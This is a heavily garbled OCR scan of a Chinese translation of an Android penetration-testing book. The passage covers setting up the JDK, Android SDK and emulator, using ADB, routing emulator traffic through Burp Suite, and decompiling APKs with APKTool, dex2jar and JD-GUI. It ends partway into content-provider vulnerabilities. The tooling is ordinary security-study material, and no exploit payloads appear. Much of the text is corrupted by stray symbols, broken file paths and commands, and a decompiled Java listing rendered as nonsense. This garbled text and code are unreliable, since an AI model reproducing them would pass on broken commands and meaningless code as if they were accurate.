就 像 下 载 它 并 运行 下 载 的 可 执行 文件 一 样 简单 。 在 以 下 屏幕 截图 中 ， 你 可 以 看 到 我 的 系 
统 上 安装 了 Java: 


ORACLE 


Status: Extracting Installer 





2 一 旦 我 们 下 载 并 安装 了 JDK， 我 们 需要 在 我 们 的 系统 上 设置 环境 变量 ， 以 便 可 以 从 任何 
路 径 执 行 Java。 


对 于 Windows 用 户 ， 我 们 需要 右键 单 击 My Computer (我 的 电脑 ) 图 标 ， 然 后 选 
择 properties (属性 ) 选项 。 


3， 接 下 来 ， 我 们 需要 从 顶部 选项 卡 列表 中 选择 advanced system settings (高 级 系统 设置 ) 
选项 : 


System Properties 


Computer Name Hardware | Advanced | System Protection | Remote 


You must be logged on as an Administrator to make most of these changes. 


Performance 


Visual effects, processor scheduling, memory usage, and virtual memory 


Settings... 


User Profiles 
Desktop settings related to your signin 


Startup and Recover 
System startup, system failure, and debugging information 


Settings... 


Environment Variables... 





4. 一 旦 我 们 进入 了 system Properties (系统 属性 ) 对 话 框 ， 在 右 下 角 ， 我 们 可 以 看 
到 Environment Variables. (环境 变量 ) 选项 。 妆 我 们 点 击 它 ， 我 们 可 以 看 到 另 一 
An?» 包含 系统 变量 及 其 值 ， 在 System variables (系统 变量 ) 部 分 下 : 


System variables 


Variable Value 
OS Windows_NT 
C:\Windows system32:C:\Windows:C:\,.. 


PATHEXT .COM;.EXE;.BAT;.CMD;.VB5;.VBE;.J5;.... 
| PROCESSOR_A... x86 





5, 在 新 的 弹出 对 话 框 中 4 我 们 需要 单 击 Variables (变量 ) 下 的 PATH AME ? 并 键入 
Java 安装 文件 夹 的 路 径 


Edit System Variable 


Variable name: Path 


Variable value: Ww LO\C: Program Files \Java\jdk1.8.0\bin\, 


OK Cancel 





对 于 Mac OS X， 我 们 需要 编辑 /.bash_profile 文件 ， 并 将 Java 的 路 径 追 加 到 PATH X 


在 Linux 机 器 中 ， 我 们 需要 编辑 ./bashrc 文件 并 附加 环境 变量 行 。 这 里 是 命令 : 


$ nano ~/.bashrc 
$ export JAVA_HOME='/usr/libexec/java_home -v 1.6 or export JAVA HOME= /usr/l1ibex 
ec/java_home -v 1.7` 


你 还 可 以 通过 从 终端 运行 以 下 命令 来 检查 Java 是 否 已 正确 安装 和 配置 : 


$ java --version 


.一 旦 我 们 下 载 并 配置 了 Java 的 环境 变量 ， 我 们 需要 执行 的 下 一 步 是 下 
载 http://developer.android.com/sdk/index.html 中 提供 的 Android ADT 包 。 


ADT 包 是 由 Android 团队 准备 的 一 个 完整 的 包 ， 包 括 配 置 了 ADT 插件 ，Android SDK 工 
F > Android 平台 工具 ， 最 新 的 Android 平台 和 模拟 器 的 Android 系统 映像 的 Eclipse ° 
这 大 大 简化 了 早期 下 载 和 使 用 Android SDK 配置 Eclipse 的 整个 过 程 ， 因 为 现在 的 一 切 
都 已 预先 配置 好 了 。 


. 一旦 我 们 下 载 了 ADT 包 ， 我 们 可 以 解压 它 ， 并 打开 Eclipse 文件 夹 。 


.启动 时 ，ADT 包 将 要 求 我 们 配置 Eclipse 的 工作 区 。 workspace (工作 空间 ) 是 所 有 
Android 应 用 程序 开发 项 目 及 其 文件 将 被 存储 的 位 置 。 在 这 种 情况 下 ， 我 已 将 所 有 内 容 保 
留 上 默认， 并 选中 Use this as the default and do not ask me again (使 用 此 为 默认 值 ， 
不 再 询问 我 ) 复 选 框 : 


Select a workspace 


ADT stores your projects in a folder called a workspace. 
Choose a workspace folder to use for this session. 


Workspace: | (SUS 


|_| Use this as the default and do not ask again 





9， 一 旦 完全 局 动 ， 我 们 可 以 继续 创建 Android Mies > Android 虚拟 设备 是 配置 用 于 特 
o Aada IRMA o IAA 24 Android SDK 软件 包 一 起 提供 的 虚拟 设 
备 ， 通 ， 开 发 人 员 可 以 运行 正常 设备 的 应 用 程序 ， 并 与 他 们 在 实际 设备 上 进行 交 
Fo coven Android 设备 但 仍然 想 创 建 Android 应 用 程序 的 开发 者 也 很 有 用 。 


wn™ 


/ 王 

这 里 要 注意 的 一 个 有 趣 的 特性 是 ， 在 Android 中 ， 模 拟 器 运行 在 ARM 上 ， 模 拟 的 所 有 的 事情 
与 昌 实 设备 完全 相同 。 然 而 ， 在 iOS 中 ， 我 们 的 模拟 器 只 是 模拟 环境 ， 并 不 拥有 所 有 相同 组 
件 和 平台 。 


2.2 创建 Android 虚拟 设备 


为 了 创建 Android 虚 拟 设备 ， 我 们 需要 执行 以 下 操作 : 


1. 访问 Eclipse 的 顶部 栏 ， 然 后 点 击 Android 图 标 穷 边 的 设备 图 标 。 这 将 打开 一 个 新 
的 Android Virtual Device Manager PAG 虚拟 设备 管理 器 ) 窗口 ， 其 中 包含 所 有 虚 
拟 设 备 的 列表 。 这 是 一 个 很 好 的 选择 ， 通 过 点 击 new (新 建 ) 按钮 ， 创 建 一 个 新 的 虚拟 
设备 。 

2， 我 们 还 可 以 通过 从 终端 运行 android 命令 并 访问 工具 ， 然 后 管理 AVD 来 启动 Android Æ 
拟 设 备 。 或 者 ， 我 们 可 以 简单 指定 AVD 名 称 ， 并 使 用 模拟 器 -avd [avd-name] 命令 来 局 
动 特定 的 虚拟 设备 。 

文 会 打开 一 个 新 窗口 ， 其 中 包含 需要 为 Android 虚拟 设备 配置 的 所 有 属性 (HRA 
E) 。 我 们 将 配置 所 有 选项 ， 如 下 面 的 截图 所 示 : 


AVD Name: | AttifyAVD 


Device: “Nexus 4 (4.7", 708 x 1280: xhdpi) 


Target: Android 4.4 - API Level 19 


CPU/ABI: ARM (armeabi-v a) 
Keyboard: Hardware keyboard present 
Skin: Display askin with hardware controls 


Front Camera: None 


Back Camera: ‘None 





Internal Storage: 


SO Card: 
(@) Size: | 30 


(C) File: 


Emulation Options: [C] Snapshot | | Use Host GPU 


Override the existing AVD with the same name 





一 旦 我 们 点 击 ok 并 返回 到 AVD 管理 器 窗口 ， 我 们 将 看 到 我 们 新 创建 的 AVD e 
现在 ， 只 需 选 择 新 的 AVD > REŽE start... (开始 ) 来 启动 我 们 创建 的 庶 拟 设备 。 


它 可 能 需要 很 长 时 间 ， 来 为 你 的 第 一 次 使 用 加 载 ， 因 为 它 正 在 配置 所 有 的 硬件 和 软件 配 
置 ， 来 给 我 们 中正 的 电话 般 的 体验 。 


， 在 以 前 的 配置 中 ， 为 了 节省 虚拟 设备 的 局 动 时 间 ， 选 中 snapshot 复 选 框 也 是 一 个 不 错 的 
选择 


一 旦 设备 加 载 ， 我 们 现在 可 以 访问 我 们 的 命令 提示 符 ， 并 使 用 android 命令 检查 设备 配 
置 。 此 二 进 制 文件 位 于 安装 中 的 /sdk/tools 文件 夹 下 的 adt-bundle ee 


我 们 还 要 设置 位 于 sdk 文件 夹 中 的 tools 和 platform-tools 文件 夹 的 位 置 ， 就 像 我 们 之 
前 使 用 环境 变量 一 样 。 


为 了 获取 我 们 系统 中 已 连接 (或 加 载 ) 的 设备 的 详细 配置 信息 ， 可 以 运行 以 下 命令 : 


android list avd 


我 们 在 下 面 的 屏幕 截图 中 可 以 看 到 ， 上 面 的 命令 的 输出 显示 了 我 们 系统 中 所 有 现 有 
Android 虚拟 设备 的 列表 : 


C: \Users\adiĝx90\Downloads\Compressed\adt-bundle-windows-x86-20131030\adt-bundle 
-windows-x86-26131636\sdk\toolstandroid list avd 
Available Android Virtual Devices: 

Name: AttifyAVD 

Path: C:\Users\adi@x9@\.android\avd\AttifyAVD. av 


Target: Android 4.4 (API level 19) 
ABI: ar rei ale 7a 
Skin: “12788 

Sdcard: 





9. 我 们 现在 将 继续 ， 使 用 ADB X Android Debug Bridge 开始 使 用 设备 ， 我 们 在 上 一 草 中 
已 经 看 到 。 我 们 还 可 以 通过 在 终端 中 执行 emulator -avd [avdname] 命令 来 运行 模拟 器 。 


2.3 Fie MIAK ALA 


现在 ， 让 我 们 详细 了 解 一 些 有 用 的 Android 渗透 测试 实用 工具 ， 如 Android Debug Bridge ° 
Burp Suite 和 APKTool ° 


Android Debug Bridge 


Android Debug Bridge 是 一 个 客户 端 - veri’ > 允许 用 户 与 模拟 器 器 或 连接 的 Android 
GO 理 通信 的 服务 器 0 
为 后 人 台 进 程 在 模拟 器 和 设备 上 上 运行 的 守护 程序 。 客户 端 用 于 ADB 通信 的 默认 端口 始终 
5037， 设 备 使 用 从 5555 到 5585 的 端口 。 


全 
ped 
SAS 
(5 
wu 
过 


让 我 们 继续 ， 通 过 运行 adb devices 命令 开始 与 启动 的 模拟 器 交互 。 它 将 显 
并 运行 以 及 连接 到 ADB : 


C:\Users\adi0x90\Downloads\adt-bundle\sdk\platform-tools>adb devices 
List of devices attached 
emulator -5554 device 


在 某 些 情况 下 ， oe rm ee 连接 ， 你 也 不 会 在 输出 中 看 到 设备 。 在 这 
况 下 ， 我 们 需要 重新 尼 动 ADB 服务 器 ， 杀 死 服务 器 ， 然 后 再 次 司 动 它 : 


C:\Users\adi0x90\Downloads\adt-bundle\sdk\platform-tools>adb kill-server 


+O) 


: \Users\adi0x90\Downloads\adt-bundle\sdk\platform-tools>adb start-server 
daemon not running. starting it now on port 5037 * 
* daemon started successfully * 


我 们 还 可 以 使 用 pm 〈 包 管理 器 ) 工具 获取 所 有 已 安装 的 软件 包 的 列表 ， 这 可 以 在 ADB 中 使 
用 


adb shell pm list packages 


如 下 面 的 屏幕 截图 所 示 ， 我 们 将 获得 设备 上 安装 的 所 有 软件 包 的 列表 ， 这 在 以 后 的 阶段 可 能 
会 有 用 : 


>: Us es *x66- 26131638 adt-bundle 
indows 236-2013 1830. sdk\platform-toolstadb shell pm list packages 
(ORL aoai sondre cordar 
: com. android.sdksetup 
: com. android. launcher 
: com. android.defcontainer 
: com. android .smoketest 


li 


‘com.android.quicksearchbox 
‘com.android. contacts 
com.android.inputmethod,. latin 
‘com.android. phone 

‘com.android. calculator? 
‘com.android.proxyhandler 
‘com.android.htmlviewer 
‘com.android.emulator.connectivity.test 


此 外 ， 我 们 可 以 使 用 dumpsys meminfo 然后 是 adb shell 命令 ， 获 取 所 有 应 用 程序 及 其 当前 内 
存 占 用 的 列表 


rma A | 


LI LJ 
Ei 


ol u 
m m 





' # dumpsys meminfo 
1 eninfo 


rocess: 

com.android.systemui (pid 741) 

com te uncher (pid 698 / activities) 
system (pid 37 


LF 
Bg oo 


ygote (pid 
surfaceflinger (pid 53) 

com.android.phone (pid 
com.android.inputmethod. ite in (pid 564) 
com.android. aa (pid 18 
android.process.acore can ae 

ne: es) A a (pid 972) 
com.android.mms (pid 1051) 
com.android.calendar (pid 1080) 
com.android.settings (pid 593) 
com.android.providers. calendar or 1032) 
com.android.deskclock (pid 1102 
mediaserver (pid 56) 
com.android.printspooler (pid 1223) 
drmserver (pid 55) 

netd (pid 50) 

keystore (pid 58) 
vold (pid 48) 
finit (pid 1) 
rild (pid 52) 
ueventd (pid 33) 


我 们 还 可 以 获取 logat (这 是 一 个 读 取 Android 设备 事件 日 志 的 工具 ) ， 并 将 其 保存 到 特定 
文件 ， 而 不 是 在 终端 上 打印 : 
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adb logcat -d -f /data/local/logcats.log 


此 处 的 -a 标志 指定 转 储 完 志文 件 的 并 退出 ， -f 标志 指定 写 入 文件 而 不 是 在 终端 上 打 
印 。 ap ee /data/local ee ， 而 不 是 任何 其 他 位 置 ， 因 为 这 个 位 置 在 大 多 数 设 备 中 
ETE th» 


我 们 还 可 以 使 用 df 命令 检查 文件 系统 以 及 可 用 空间 和 大 小 


root@generic: / 
df 
Filesy ratem 


| obb 


vatem 


/data 
haisi a Sican 
stor rage/sdcard 


= 





在 Android SDK 中 还 有 另 一 个 很 棒 的 工具 ， 称 为 MonkeyRunner。 此 工具 用 于 自动 化 和 测试 
Android 应 用 程序 ， 甚 至 与 应 用 程序 交互 。 人 例如， 为 了 使 用 10 个 自动 化 触摸 ， 敲 击 和 事件 来 
测试 应 用 程序 ， 我 们 可 以 在 adb shell 中 使 用 monkey 10 命令 


root@generic:/ # monkey 10 

monkey 10 

Events injected: 10 

## Network stats: elapsed time=9043ms (Oms mobile, Oms wifi, 9043ms not connected) 


这 些 是 一 些 有 用 的 工具 和 命令 ， 我 们 可 以 在 ADB 中 使 用 它们 。 我 们 现在 将 继续 下 载 一 些 我 们 
将 来 使 用 的 其 他 工具 。 


Burp Suite 


我 们 将 在 接 下 来 的 划 节 中 使 用 的 最 重要 的 工具 之 一 是 Burp 代理 。 我 们 将 使 用 它 来 拦截 和 分 
析 网 络 流量 。 应 用 程序 中 的 许多 安全 漏洞 可 以 通过 拦截 流量 数据 来 评估 和 发 现 。 在 以 下 步骤 
中 执行 此 操作 : 


我 们 现在 从 官方 网 站 有 net/burp/download. html gts burp 代理 。 
并 安装 后 ， 你 需要 打开 Burp 窗口 ， 它 如 以 下 屏幕 截图 所 示 。 你 还 可 以 使 用 以 下 命 
% Burp : 


java -jar burp-suite. jar 


我 们 在 下 面 的 截图 中 可 以 看 到 ， 我 们 运行 了 Burp 并 显示 了 默认 界面 : 


6. 
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在 Burp Suite 工具 中 ， 我 们 需要 通过 单 击 Proxy (KH) 选项 卡 并 访问 options (# 
项 ) 选项 卡 来 配置 代理 设置 。 


在 Options 选项 卡 中 ， 我 们 可 以 看 到 默认 选项 被 选中 ， 这 是 127.0.0.1:8080 。 这 意味 着 
从 我 们 的 系统 端口 soso 发 送 的 所 有 流量 将 由 Burp Suite 拦截 并 且 在 它 的 窗口 显示 。 
我 们 还 需要 通过 选择 默认 代理 127.0.0.1:8080 FPA Edit (编辑 ) 来 检查 隐藏 的 代理 选 


项 o 


接 下 来 ， 我 们 需要 访问 Request handling (请 求 处 理 ) 选项 卡 ， 并 选 
中 Support invisible proxying (enable only if needed) (支持 不 可 见 代 理 ( 仅 在 需要 时 
启用 ) ) 复 选 框 : 


[2] These settings control whether Burp redirects requests received by this listener. 


Redirect to host: 
Redirect to port: | 


C] Force use of SSL 


Invisible proxy support allows non-proxy-aware clients to connect directly to the listener. 


Support invisible proxying (enable only if needed) 





最 后 ， 我 们 使 用 invisible 选项 运行 代理 : 


Proxy Listeners 


Burp Proxy utes istaners to receive Mcoming HTTP requeais from your brow eer. You wil need to configure your browser lo usa one of the bians 
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置 了 代理 ， 我 们 将 启动 我 们 的 模拟 器 与 我 们 刚刚 设置 的 代理 。 我 们 将 使 用 以 下 模 
今 


— 84% 
拟 器 命令 来 使 用 http-proxy 选项 : 


emulator -avd [name of the avd] -http-proxy 127.0.0.1:8080 


我 们 可 以 在 下 面 的 截图 中 看 到 命令 如 何 使 用 : 


IC: \Users vart ynloads\Compressedi ae bundle-windo 6- #81731636',adt- bundle 
|- windows - zt ate 318 330 sdk\toolstemulator.exe -awd attify -http- pr oxy 127.0.0. 


|1 : 8666 





DE 我 们 已 经 配置 了 Burp 代理 和 模拟 器 ， 导 致 所 有 的 模拟 器 流量 现在 会 通过 Burp。 在 这 
你 在 访问 使 用 SSL 的 网 站 时 可 能 会 遇 到 问题 ， 我 们 将 在 后 面 的 章节 中 涉及 这 些 问 题 。 


APKTool 


Android 逆向 工程 中 最 重要 的 工具 之 一 是 APKTool。 它 为 逆向 第 三 方 和 封闭 的 二 进 制 Android 
应 用 程序 而 设计 。 这 个 工具 将 是 我 们 在 未 来 章节 中 的 逆向 主题 和 恶意 软件 分 析 的 重点 之 一 。 
为 了 开始 使 用 APKTool， 请 执行 以 下 步骤 : 


1. 为 了 下 载 APKTool， 我 们 需要 访 


ha https://code.google.com/p/android-apktool/downloads/list ° 


在 这 里 ， 我 们 需要 下 载 两 个 文件 : apktool1.5.3.tar.bz2 ， 其 中 包含 apktool 主 二 进 制 文 
件 ， 另 一 个 文件 取决 于 平台 - 无 论 是 Windows > Mac OS X 还 是 Linux。 


2. 一 旦 下 载 和 配置 完成 ， 出 于 便利 ， 我 们 还 需要 将 APKTool 添加 到 我 们 的 环境 变量 。 此 
外 ， 最 好 将 APKTool 设置 为 环境 变量 ， 或 者 首先 将 其 安装 在 /usr/bin Po 然后 我 们 可 
以 从 我 们 的 终端 运行 APKTool， 像 下 面 的 截图 这 样 


adityagupta at MathBook Pro in 

$ apktool -h 

Apktool v1.4.3 - a tool for reengineering Android apk files 
Copyright 2010 Ryszard Wi?niewski <brut.aLlLL@gmail.com> 

Apache License 2.0 Chttp://waw.apache.org/Licenses/LICENSE-2.@) 


Usage: apktool [-ql--quiet OR -vl--verbose] COMMAND [...] 


COMMANDs are: 


d[ecode] [OPTS] <file.apk> [<dir>] 
Decode <file.apk> to <dir>. 


OPTS: 


--no-src 
Do not decode sources. 
, =- res 
Do not decode resources. 
--debug 
Decode in debug mode. Check project page for more info. 


--force 





Force delete destination directory. 


T 


心 


在 本 章 中 ， 我 们 使 用 Android SDK > ADB > APKTool 和 Burp Suite 建立 了 Android 42% Mix 
环境 。 这 些 是 Android 渗透 测试 者 应 该 喜 悉 的 最 重要 的 工具 。 


在 下 一 草 中 ， 我 们 将 学 习 如 何 北向 和 审计 Android 应 用 程序 。 我 们 还 将 使 用 一 些 工具 ， 如 
APKTool > dex2jar > jd-gui 和 一 些 我 们 自己 的 命令 行 必 杀 技 。 


第 三 章 Android 应 用 的 逆向 和 审计 


作者 : Aditya Gupta 
译 者 : 飞龙 
It : CC BY-NC-SA 4.0 


在 本 章 中 ， 我 们 将 查看 Android 应 用 程序 或 .apk 文件 ， 并 了 解 其 不 同 的 组 件 。 我 们 还 将 使 
用 工具 (如 Apktool ，dex2jar 和 jd-gui) 来 北向 应 用 程序 。 我 们 将 进一步 学 习 如 何 通 过 逆向 
和 分 析 源 代码 来 寻找 Android 应 用 程序 中 的 各 种 漏洞 。 我 们 还 将 使 用 一 些 静态 分 析 工 具 和 脚 
本 来 查找 漏洞 并 利用 它们 。 


3.1 Android 应 用 程序 拆 解 


Android 应 用 程序 是 在 开发 应 用 程 
的 扩展 名 是 .apk ， 意 思 是 应 用 程 


a een eer 


FR 
Feel > EKG RUE Lae EK Fe RK : 


e Classes.dex (文件 ) 

e AndroidManifest.xml (文件 ) 
e META-INF (文件 夹 ) 

e resources.arsc (文件 ) 

© res (文件 夹 ) 

e assets (文件 夹 ) 

e lib (文件 夹 ) 


为 了 验证 这 一 点 ， 我 们 可 以 使 用 任何 归档 管理 器 应 用 程序 (如 7zip，WinRAR 或 任何 首选 应 
用 程序 ) 简单 地 解压 缩 应 用 程序 。 在 Linux A Mac 上， 我 们 可 以 简单 地 使 用 unzip 命令 来 展 
示 压 缩 包 的 内 容 ， 如 下 面 的 截图 所 示 : 


$ unzip -l simple_game.apk 
Archive: 
Length 


simple_game. 


Date 


12-01-2013 


12-01-2013 | 


12-01-2013 
12-01-2013 
12-01-2013 
12-01-2013 


12-01-2013 : 


12-01-2013 
12-01-2013 
12-01-2013 
12-01-2013 
12-01-2013 





Name 

classes.dex 
AndroidManifest.xmlL 
res/ 
res/drawable-mdpi/ 
res/drawable-mdpi/icon.png 
res/Layout/ 
res/Layout/main. xmL 
resources.arsc 
META-INF/ 
META-INF/MANIFEST .MF 
META-INF/SIGNFILE. SF 
META-INF/SIGNFILE.RSA 


12 files 


这 里 ， 我 们 使 用 -1 (list) 标志 ， 以 便 简 单 地 展示 压缩 包 的 内 容 ， 而 不 是 解压 它 。 我 们 还 可 
以 使 用 file 命令 来 查看 它 是 否 是 一 个 有 效 的 压缩 包 。 


$ file simple_game.apk 





simplLe_game.apk: Zip archive data, at Least v2.0 to extract 


Android 应 用 程序 由 各 种 组 件 组 成 ， 它 们 一 起 创建 可 工作 的 应 用 程序 。 这 些 组 件 是 活动 ， 服 
务 ， 广 播 接收 器 ， 内 容 供 应 器 和 共享 首选 项 。 在 继续 之 前 ， 让 我 们 快速 浏览 一 下 这 些 不同 的 
组 件 : 


e 活动 (Activity) : 这 些 是 用 户 可 以 与 之 交互 的 可 视界 面 。 这 些 可 以 包括 按钮 ， 图 
像 ，Textview 或 任何 其 他 可 视 组 件 。 

o 服务 (Service) : 这 些 Android 组 件 在 后 全 运行， 并 执行 开发 人 员 指 定 的 特定 任务 。 这 
些 任务 可 以 包括 从 HTTP 下 载 文件 到 在 后 台 播 放 音 乐 的 任何 内 容 。 

e 广播 接收 器 (Broadcast Receiver) : 这 些 是 Android 应 用 程序 中 的 接收 器 ， 通 过 
Android 系统 或 设备 中 存在 的 其 他 应 用 程序 ， 监 听 传 入 的 广播 消息 。 一 旦 它们 接收 到 广播 
消息 ， 就 可 以 根据 预定 义 的 条 件 触 发 特定 动作 。 条 件 可 以 为 收 到 SMS? RSH > We 

e 共享 首选 项 (Shared Preference) : 应 用 程序 使 用 这 些 首选 项 ， 以 便 为 应 用 程序 保存 小 
型 数据 集 。 此 数据 存储 在 名 为 shared_prefs 的 文件 夹 中 。 这 些小 数据 集 可 以 包括 名 值 
对 ， 例 如 游戏 中 的 用 户 得 分 和 登录 赁 证。 不 建议 在 共享 首选 项 中 存储 敏感 信息 ， 因 为 它 
们 可 能 易 受 数据 贸 取 和 泄漏 的 影响 。 

。 意图 (Intent) : 这 些 组 件 用 于 将 两 个 或 多 个 不 同 的 Android 组 件 绑 定 在 一 起 。 意 图 可 以 
用 于 执行 各 种 任务 ， 例 如 启动 动作 ， 切 换 活动 和 启动 服务 。 

e 内 容 供 应 器 (Content Provider) : 这 些 组 件 用 于 访问 应 用 程序 使 用 的 结构 化 数据 集 。 应 
用 程序 可 以 使 用 内 容 供 应 器 访问 和 查询 自己 的 数据 或 存储 在 手机 中 的 数据 。 


现在 我 们 知道 了 Android 应 用 程序 内 部 结构 ， 以 及 应 用 程序 的 组 成 方式 ， 我 们 可 以 继续 逆向 
Android 应 用 程序 。 当 我 们 只 有 apk 文件 时 ， 这 是 获得 可 读 的 源 代 码 和 其 他 数据 源 的 方式 。 


3.2 逆向 Android 应 用 


正如 我 们 前 面 讨 论 的 ，Android 应 用 程序 只 是 一 个 数据 和 资源 的 归档 文件 。 即 使 这 样 ， 我 们 不 
能 简单 地 解压 缩 归档 包 ( apk ) 来 获得 可 读 的 源 代码 。 对 于 这 些 情况 ， 我 们 必须 依赖 于 将 
字 节 代码 (如 在 classes.dex 中 ) 转换 为 可 读 源 代码 的 工具 。 


将 字 节 码 转 换 为 可 读 文 件 的 一 种 方法 ， 是 使 用 一 个 名 为 dex2jar 的 工具 。 .dex 文件 是 由 
Java 字 节 码 转 换 的 Dalvik 他 节 码 ， 使 其 对 移动 平台 优化 和 高 效 。 这 个 免费 的 工具 只 是 将 
Android 应 用 程序 中 存在 的 ,dex 文件 转换 为 相应 的 .jar 文件 。 请 遵循 以 下 步骤 : 


1. 从 https://code.google.com/p/dex2jar/ 下 载 dex2jar 工具 。 
2, 现在 我 们 可 以 使 用 它 来 运行 我 们 的 应 用 程序 的 .dex 文件 ， 并 转换 为 ,jar 格式 。 


3 现在， 我 们 需要 做 的 是 ， 转 到 命令 提示 符 并 访问 dex2jar 所 在 的 文件 夹 。 接 下 来 ， 我 们 
需要 运行 d2j-dex2jar.bat 文件 (Æ Windows 上 ) 或 d2j-dex2jar.sh 文件 (在 Linux/ 
Mac 上 ) ， 并 提供 应 用 程序 名 称 和 路 径 作 为 参数 。 这 里 的 参数 中 ， 我 们 可 以 简单 地 使 
用 .apk 文件 4 或 者 我 们 甚至 可 以 解压 缩 .apk 文件 然后 传递 classes.dex 文件 ”如 下 
面 的 截图 所 示 : 


£:\Desktop\dex2jar-08.0.9.9>d2j-dex2jar.bat “Z:\Desktop\helloworld.apk”" 
dexJjar #:\Desktop\helloworld.apk -> helloworld-dex2jar.jar 


正如 我 们 在 上 面 截图 中 看 到 的 ，dex2jar 已 经 成 功 地 将 应 用 程序 的 .dex 文件 转换 为 名 
为 helloworld-dex2jar.jar 的 .jar 文件 。 现 在 ， 我 们 可 以 在 任何 Java 图 形 碍 看 器 (如 
JD-GUI) 中 打开 此 .jar 文件，JD-GUI 可 以 从 其 官方 网 站 http://jd.benow.ca/ FR ° 


4 一 旦 我 们 下 载 并 安装 JD-GUI， 我 们 现在 可 以 继续 打开 它 。 它 看 起 来 像 下 面 的 截图 所 示 : 


大大 


三 章 Android 应 用 的 逆向 和 审计 


| 
File Edit Navigate Search Halp 
E| FF an e + 





5 在 这 里 ， 我 们 现在 可 以 打开 之 前 步骤 中 转换 的 ,jar 文件 ， 并 查看 JD-GUI 中 的 所 有 
Java 源 代 码 。 为 了 打开 ajar 文件 ， 我 们 可 以 简单 地 访问 File | Open ° 


| ig 
File Edit Mavigate Search 


package coe.editya.fellowsrla: 
isport android.epp Activity: 


public class KySimpleGame 
entenis Activity 

[ 
private boolean isiyServiceRunsing(} 
{ 


TteGetoe Lecaeliterstas = ((Recivicyiteseger) gectyatestarvicg activity .gethemiagsesrices (2147 
af ('leceliceracar.sesHexrc()}) {|} 

for (ialean bool = falesiz; bool = tras) 

i 


Feturn Beal: 
if dl com aditje. bellovorlé. ti BuaingSerticelafa) lccaliterat 


sete Sandie parerBundie) 


GT GRCRESES ioaramBundle)r 
i ; 





在 右 侧 窗 格 中 ， 我 们 可 以 看 到 Java 应 用 程序 的 Java 源 代 码 和 所 有 方法 。 请 注意 ， 重 新 编译 
过 程 会 为 你 提供 原始 Java 源 代 码 的 近似 版 本 。 这 在 大 多 数 情况 下 无 关 紧 要 ; 但 是 ， 在 东 些 情 
况 下 ， 你 可 能 会 看 到 转换 的 .jar 文件 中 缺少 东 些 代码 。 此外， 如 果 应 用 程序 开发 人 员 使 用 

一 些 防 止 反 编译 的 保护 ， 如 proguard 和 dex2jar ， 当 我 们 使 用 dex2jar 或 Apktool 反 编 译 应 用 
程序 时 ， 我 们 不 会 看 到 准确 的 源 代码 ; 相反 ， 我 们 将 看 到 一 堆 不 同 的 源 文 件 ， 这 不 是 原始 源 代 


码 的 准确 表示 。 
3.3 使 用 Apktool 逆向 Android 应 用 
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另 一 种 逆向 Android 应 用 程序 的 方法 是 将 .dex 文件 转换 为 smali 文件 。 smali 是 一 种 文件 格 
式 ， 其 语法 与 称 为 Jasmine 的 语言 类 似 。 我 们 现在 不 会 深入 了 解 smali 文件 格式 。 有 关 更 多 
言 息 ， 请 参阅 在 线 wiki https://code.google.com/p/smali/wiki/ ， 以 便 深 入 了 解 smali ° 


一 旦 我 们 下 载 Apktool 并 配置 它 ， 按 照 前 面 的 草 节 的 指示 ， 我 们 都 做 好 了 进一步 的 准备 。 与 

JD-GUI 相 比 ，Apktool 的 主要 优点 是 它 是 双向 的 。 这 意味 着 如 果 你 反 编 译 一 个 应 用 程序 并 修 
改 它 ， 然 后 使 用 Apktool 重新 编译 它 ， 它 能 跟 完 美 重新 编译 ， 并 生成 一 个 新 的 ,apk 文件 。 然 
而 ，dex2jar 和 JD-GUI 不 能 做 类 似 功 能 ， 因 为 它 提供 近似 代码 ， 而 不 是 准确 的 代码 。 

因此 ， 为 了 使 用 Apktool 反 编 译 应 用 程序 ， 我 们 所 需要 做 的 是 ， 将 .apk 文件 与 Apktool 二 进 
制 文件 一 起 传递 给 命令 行 。 一 旦 反 编 译 完成 ，Apktool 将 使 用 应 用 程序 名 称 创建 一 个 新 的 文件 
$ o» 其 中 会 存储 所 有 的 文件 。 为 了 反 编 译 á 我 们 只 需 调 用 apktool d [app-name].apk ° 这 

Zo d 标志 表示 反 编 译 。 


在 以 下 屏幕 截图 中 ， 我 们 可 以 看 到 使 用 Apktool 进行 反 编 译 的 应 用 程序 : 


dityagupta ot MathBook Pro in 
apktool d catch.apk 
: Baksmaling... 
: Loading resource table... 
: Loaded. 
: Loading resource table from file: /Users/adityagupta/apktool/framework/1.apk 


: Loaded. 

: Decoding file-resources... 
: Decoding values*/* XMLs... 
: Done, 

: Copying assets and libs... 





现在 ， 如 果 我 们 进入 smali 文件 夹 ， 我 们 将 看 到 一 堆 不 同 的 smali 文件 ， 它 们 包含 开发 应 用 程 
序 时 编写 的 Java 类 的 代码 。 在 这 里 ， 我 们 还 可 以 打开 一 个 文件 ， 更 改 一 些 值 ， 并 使 用 
Apktool 再 次 构建 它 。 为 了 从 smali 构建 一 个 改动 的 应 用 程序 ， 我 们 将 使 用 Apktool 中 

的 b (build) 标志 。 


apktool b [decompiled folder name] [target-app-name].apk 


但 和 是， 为 了 反 编 译 ， 修 改 和 重新 编译 应 用 程序 ， 我 个 人 建议 使 用 另 一 个 名 为 Virtuous Ten 
Studio (VTS) 的 工具 。 这 个 工具 提供 与 Apktool 类 似 的 功能 ， 唯 一 的 区 别 是 VTS 提供 了 一 
个 漂亮 的 图 形 界 面 ， 使 其 相对 容易 使 用 。 此 工具 的 唯一 限制 是 ， 它 只 在 Windows 环境 中 运 
行 。 我 们 可 以 从 官方 下 载 链 接 http://www.virtuous-ten-studio.com/ 下 载 VTS。 以 下 是 反 编 译 
同一 项 目的 应 用 程序 的 屏幕 截图 : 





审计 Android ~ 用 


Android 应 用 程序 通常 包含 许多 安全 汤 洞 ， 大 多 数 时 候 是 由 于 开发 人 员 的 错误 和 安全 编码 实践 
的 无 视 。 在 本 节 中 ， 我 们 将 讨论 基于 Android 应 用 程序 的 漏洞 ， 以 及 如 何 识 别 和 利用 它们 。 


> = ~ S ie 


许多 应 用 程序 使 用 内 容 供应 器 来 存储 和 查询 应 用 程序 中 的 数据 或 来 自 电 话 的 数据 。 除非 已 经 
定义 了 内 容 提 供 者 可 以 使 用 权限 来 访问 ， 否 则 任何 其 他 应 用 都 可 以 使 用 应 用 所 定义 的 内 容 供 
应 器 ， 来 访问 应 用 的 数据 。 所 有 内 容 供 应 器 具有 唯一 的 统一 资源 标识 答 《URI) 以 便 被 识别 
和 查询 。 内 容 提供 者 的 URI 的 命名 标准 惯例 是 以 content:// 开始 。 


A a a a a A 
员 指 定 权 限 ， 否 则 任何 应 用 程序 都 可 以 使 用 应 用 程序 的 内 容 供 应 器 ， 来 访问 和 查询 数据 。 所 
